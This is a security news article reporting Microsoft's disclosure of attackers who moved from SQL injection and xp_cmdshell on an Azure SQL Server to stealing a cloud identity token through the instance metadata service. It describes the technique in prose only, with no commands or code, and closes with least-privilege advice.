Cloud Security , Security Operations

Attackers Exploit SQL Server to Penetrate Azure Cloud

Microsoft Discloses Unusual Hacking Attempt
Attackers Exploit SQL Server to Penetrate Azure Cloud
Image: Shutterstock

Microsoft says it spotted an unusual hacking campaign in which hackers attempted to move laterally through the Azure cloud after compromising a virtual SQL server.

See Also: Code to Cloud Roadshow - Minneapolis In-Person Event hosted by Palo Alto Networks

It marks the first time that cyber defenders for the computing giant have seen a lateral movement attempt in the Azure cloud with SQL Server as the starting point, the company said in a Tuesday blog post. Hackers have previously done so with VMs and Kubernetes clusters, but "but not in SQL Server."

Microsoft said it is disclosing the attempt despite having detected the hackers so defenders can be "aware of this technique used in SQL Server instances."

Lateral movement is the bread-and-butter hacking method that uses an initial foothold into a network as the jumping-off point for further access to data and systems. Microsoft said the rise of cloud computing is leading to hackers probing for new methods to achieve lateral movement. One technique is to use the identity of the hacked cloud resource - the cloud identity - to pivot to other resources to which the cloud tenant has access.

Hackers began with an SQL injection attack, likely on an application that had elevated permissions within the tenant's Azure environment. The attackers used the elevated permission to turn on xp_cmdshell, a method to launch operating system commands through a SQL query. Microsoft turns off the command by default in SQL Server, as a precaution.

Microsoft said the hackers performed typical hacking behavior - reading directories, listing processes, downloading "several executables and PowerShell scripts."

It's what they did afterward that has Redmond's attention. They used the Azure Instance Metadata Service - aka the IMDS - to obtain the cloud identity access key of the virtual SQL Server. An IMDS query returns data such as JSON Web Token containing the claims and the signature of the identity.

With the identity token, hackers could have gone beyond the SQL Server into other cloud resources. They failed "due to an error," Microsoft said. One way to head off similar future attempts, the company said, is to make sure that cloud resources operate at the least privilege level required.


About the Author

Prajeet Nair

Prajeet Nair

Assistant Editor, Global News Desk, ISMG

Nair previously worked at TechCircle, IDG, Times Group and other publications, where he reported on developments in enterprise technology, digital transformation and other issues.




Around the Network

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing bankinfosecurity.com, you agree to our use of cookies.